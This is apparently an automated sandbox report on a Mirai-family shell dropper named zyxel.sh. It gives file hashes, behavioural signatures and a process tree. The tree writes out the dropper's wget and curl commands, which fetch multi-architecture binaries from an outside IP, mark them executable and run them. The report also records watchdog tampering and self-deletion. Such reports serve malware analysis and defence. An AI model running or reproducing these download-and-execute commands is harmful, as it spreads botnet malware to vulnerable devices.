Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
137s -
max time network
156s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
11/03/2025, 08:23
Static task
static1
Behavioral task
behavioral1
Sample
zyxel.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
zyxel.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
zyxel.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
zyxel.sh
-
Size
2KB
-
MD5
2868096acc1080a6e23f9e794a721172
-
SHA1
78d80333f12bb64b2a1f64d42d45bb6a86d41126
-
SHA256
677a38c89721dcffc6ccd08d9a3dbd0a4deabbf92bd9996dfcce16a5e6ab576c
-
SHA512
144336920167e270947efbba30a98b8352be3b6cb9ee7ea878f6537323bd0356c16424b815c21df3fe64686afcd5f8c975d7445090d2c5d651cdb9e49daf68c8
Malware Config
Extracted
mirai
UNSTABLE
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 754 chmod 781 chmod 815 chmod 829 chmod 765 chmod 843 chmod 851 chmod 856 chmod 862 chmod 705 chmod 714 chmod 727 chmod 741 chmod -
Deletes itself 2 IoCs
pid Process 742 WTH 783 WTH -
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/WTH 707 zyxel.sh /tmp/WTH 715 zyxel.sh /tmp/WTH 729 zyxel.sh /tmp/WTH 742 zyxel.sh /tmp/WTH 755 zyxel.sh /tmp/WTH 766 zyxel.sh /tmp/WTH 783 zyxel.sh /tmp/WTH 816 zyxel.sh /tmp/WTH 830 zyxel.sh /tmp/WTH 844 zyxel.sh /tmp/WTH 852 zyxel.sh /tmp/WTH 857 zyxel.sh /tmp/WTH 863 zyxel.sh -
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTH File opened for modification /dev/misc/watchdog WTH File opened for modification /dev/watchdog WTH File opened for modification /dev/misc/watchdog WTH -
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp WTH -
Writes file to system bin folder 4 IoCs
description ioc Process File opened for modification /sbin/watchdog WTH File opened for modification /bin/watchdog WTH File opened for modification /sbin/watchdog WTH File opened for modification /bin/watchdog WTH -
resource yara_rule behavioral2/files/fstream-1.dat upx behavioral2/files/fstream-4.dat upx behavioral2/files/fstream-5.dat upx behavioral2/files/fstream-6.dat upx behavioral2/files/fstream-7.dat upx -
Changes its process name 2 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself dgubkgf18w4f 742 WTH Changes the process name, possibly in an attempt to hide itself vijortc4tmi2d65t 783 WTH -
Checks CPU configuration 1 TTPs 13 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp WTH -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/exe WTH File opened for reading /proc/self/exe WTH File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/exe WTH File opened for reading /proc/self/exe WTH File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/maps WTH File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/maps WTH File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 709 wget 711 curl 713 cat -
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/EdiAf.x86 wget File opened for modification /tmp/EdiAf.arm wget File opened for modification /tmp/EdiAf.arm curl File opened for modification /tmp/EdiAf.ppc curl File opened for modification /tmp/EdiAf.spc curl File opened for modification /tmp/EdiAf.arc curl File opened for modification /tmp/EdiAf.mips wget File opened for modification /tmp/EdiAf.mips curl File opened for modification /tmp/EdiAf.arm5 wget File opened for modification /tmp/EdiAf.arm6 wget File opened for modification /tmp/EdiAf.arm7 curl File opened for modification /tmp/EdiAf.spc wget File opened for modification /tmp/EdiAf.i686 curl File opened for modification /tmp/WTH zyxel.sh File opened for modification /tmp/EdiAf.mpsl curl File opened for modification /tmp/EdiAf.arm7 wget File opened for modification /tmp/EdiAf.m68k curl File opened for modification /tmp/EdiAf.sh4 wget File opened for modification /tmp/EdiAf.x86 curl File opened for modification /tmp/EdiAf.mpsl wget File opened for modification /tmp/EdiAf.arm5 curl File opened for modification /tmp/EdiAf.arm6 curl File opened for modification /tmp/EdiAf.ppc wget File opened for modification /tmp/EdiAf.m68k wget File opened for modification /tmp/EdiAf.sh4 curl
Processes
-
/tmp/zyxel.sh/tmp/zyxel.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:675 -
/usr/bin/wgetwget http://78.40.117.13/EdiAf.x862⤵
- Writes file to tmp directory
PID:681
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:697
-
-
/bin/catcat EdiAf.x862⤵PID:703
-
-
/bin/chmodchmod +x EdiAf.x86 systemd-private-1454659f5b574ea5a82f60fb8d562c12-systemd-timedated.service-OBc0Mm WTH zyxel.sh2⤵
- File and Directory Permissions Modification
PID:705
-
-
/tmp/WTH./WTH zyxel.selfrep2⤵PID:707
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:709
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:711
-
-
/bin/catcat EdiAf.mips2⤵
- System Network Configuration Discovery
PID:713
-
-
/bin/chmodchmod +x EdiAf.mips EdiAf.x86 systemd-private-1454659f5b574ea5a82f60fb8d562c12-systemd-timedated.service-OBc0Mm WTH zyxel.sh2⤵
- File and Directory Permissions Modification
PID:714
-
-
/tmp/WTH./WTH zyxel.selfrep2⤵PID:715
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.mpsl2⤵
- Writes file to tmp directory
PID:717
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:720
-
-
/bin/catcat EdiAf.mpsl2⤵PID:726
-
-
/bin/chmodchmod +x EdiAf.mips EdiAf.mpsl EdiAf.x86 systemd-private-1454659f5b574ea5a82f60fb8d562c12-systemd-timedated.service-OBc0Mm WTH zyxel.sh2⤵
- File and Directory Permissions Modification
PID:727
-
-
/tmp/WTH./WTH zyxel.selfrep2⤵PID:729
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arm2⤵
- Writes file to tmp directory
PID:732
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:735
-
-
/bin/catcat EdiAf.arm2⤵PID:739
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.mips EdiAf.mpsl EdiAf.x86 systemd-private-1454659f5b574ea5a82f60fb8d562c12-systemd-timedated.service-OBc0Mm WTH zyxel.sh2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/WTH./WTH zyxel.selfrep2⤵
- Deletes itself
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
- Reads runtime system information
PID:742
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arm52⤵
- Writes file to tmp directory
PID:744
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:748
-
-
/bin/catcat EdiAf.arm52⤵PID:753
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.arm5 EdiAf.mips EdiAf.mpsl EdiAf.x86 systemd-private-1454659f5b574ea5a82f60fb8d562c12-systemd-timedated.service-OBc0Mm WTH zyxel.sh2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/WTH./WTH zyxel.selfrep2⤵
- Reads runtime system information
PID:755
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arm62⤵
- Writes file to tmp directory
PID:756
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:759
-
-
/bin/catcat EdiAf.arm62⤵PID:763
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.mips EdiAf.mpsl EdiAf.x86 systemd-private-1454659f5b574ea5a82f60fb8d562c12-systemd-timedated.service-OBc0Mm WTH zyxel.sh2⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/WTH./WTH zyxel.selfrep2⤵
- Reads runtime system information
PID:766
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arm72⤵
- Writes file to tmp directory
PID:767
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/catcat EdiAf.arm72⤵PID:779
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.mips EdiAf.mpsl EdiAf.x86 systemd-private-1454659f5b574ea5a82f60fb8d562c12-systemd-timedated.service-OBc0Mm WTH zyxel.sh2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/WTH./WTH zyxel.selfrep2⤵
- Deletes itself
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:783
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.ppc2⤵
- Writes file to tmp directory
PID:803
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/catcat EdiAf.ppc2⤵PID:811
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.x86 WTH zyxel.sh2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/WTH./WTH zyxel.selfrep2⤵PID:816
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.m68k2⤵
- Writes file to tmp directory
PID:819
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/catcat EdiAf.m68k2⤵PID:827
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.x86 WTH zyxel.sh2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/WTH./WTH zyxel.selfrep2⤵PID:830
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.spc2⤵
- Writes file to tmp directory
PID:832
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.spc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/catcat EdiAf.spc2⤵PID:841
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.spc EdiAf.x86 WTH zyxel.sh2⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/WTH./WTH zyxel.selfrep2⤵PID:844
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.i6862⤵PID:847
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:849
-
-
/bin/catcat EdiAf.i6862⤵PID:850
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.spc EdiAf.x86 WTH zyxel.sh2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/WTH./WTH zyxel.selfrep2⤵PID:852
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.sh42⤵
- Writes file to tmp directory
PID:853
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:854
-
-
/bin/catcat EdiAf.sh42⤵PID:855
-
-
/bin/chmodchmod +x EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.sh4 EdiAf.spc EdiAf.x86 WTH zyxel.sh2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/WTH./WTH zyxel.selfrep2⤵PID:857
-
-
/usr/bin/wgetwget http://78.40.117.13/EdiAf.arc2⤵PID:859
-
-
/usr/bin/curlcurl -O http://78.40.117.13/EdiAf.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:860
-
-
/bin/catcat EdiAf.arc2⤵PID:861
-
-
/bin/chmodchmod +x EdiAf.arc EdiAf.arm EdiAf.arm5 EdiAf.arm6 EdiAf.arm7 EdiAf.i686 EdiAf.m68k EdiAf.mips EdiAf.mpsl EdiAf.ppc EdiAf.sh4 EdiAf.spc EdiAf.x86 WTH zyxel.sh2⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/WTH./WTH zyxel.selfrep2⤵PID:863
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
30KB
MD5e932653d32b429c51de2046623fa71d2
SHA132ecc535e6cf6e99f105835d4a7cb75ef4cb233a
SHA25687dd914f28847f21e680b74700b0b4b339eb8f301677b53b1dddf8ffa2f33612
SHA512e284ce814a09b33a108507645c88845aa478e05d7925742e09f190f4c733630429e9f9460c76b9e3b6ec17eddc3110e8283e515891bcaea4ce0307509fbe84c2
-
Filesize
33KB
MD5029a7185777b7f885a6c3807e46b7365
SHA187372b0029b72446861c7b429e3ef1626c337218
SHA25642c2075a2803b78355f68b9d651a7bd154e5b61f62418d84a3b4d064b5c68a7d
SHA5124890cb74a283c03d790ffe4f2e5fbc06d82d5943773874c00c48171000cb21891720a57eb22e036cd2324e28b476a38f61c29f0d05d2949c2f4c8cdb971779a8
-
Filesize
35KB
MD57327f58c0e15f6086301a81780e100dc
SHA1292bb04ad4df407ac687ef1df1071659708bd3bb
SHA256b9f12d8c72d2a2a7263e1a7c2947e3891212b3566aae1b873212c6031e02de4d
SHA5124cc238acfd72556b2453f4d2880ccc3b2f00d0899c98a6b7eeee7cb139b242b318b8483b3bc70f96ca23934719f2152712d0efb8d9a1c950a0c98eed02452911
-
Filesize
32KB
MD5addb1cd662dd870b9b7ed5273d6fa76e
SHA16e12f9d5128a0de23d4b4b0dbfbefb91ff09dfc0
SHA256cee6e1cc48f81462d1668be2c341d7cc84b24e20e1747be03ad7e296434bffe7
SHA51228525de6add0d53f05e3c7c1e7d84927f40aee8c24d531216b6a77aa0f0a11fddd67b7f41b9eccc9b6692579a0c0f7453145480f7f8bacdd5d7ab13ffaad2d4f
-
Filesize
21KB
MD5a117b1b367633cb07f0795bd5f0c6f8f
SHA132bfac42c7134383c6381b94c0d75317fcb56d11
SHA25640fe55ff37dfaa1eded6d4a0d28994f7eaa4f36c384676bf3587349390a800f0
SHA5127e9e4ac7b911b44f40eb14f684bac76478e95085ac0cc393dac95fa312057e9c4f1a3508338098026bd1369179cccae91ca07092024201b3619fdc4401a25726
-
Filesize
75KB
MD5642dff628df548a6c458f004fd3b5aa1
SHA1cfd38a2a7522ed9637978f6f2c6ba117d60a9ec7
SHA256219f1a94474530ae2502631dabb897e1442ce2b535728f36e7eb5153ae2228ed
SHA512dc4ae205c670da0ead108aa30eb7627fab0a11fe4c47ce2c66042f89ef0ba4f52792d8217d98852e0c471f071079bb76bc4b975e32a018e3a5eeceb98c33f851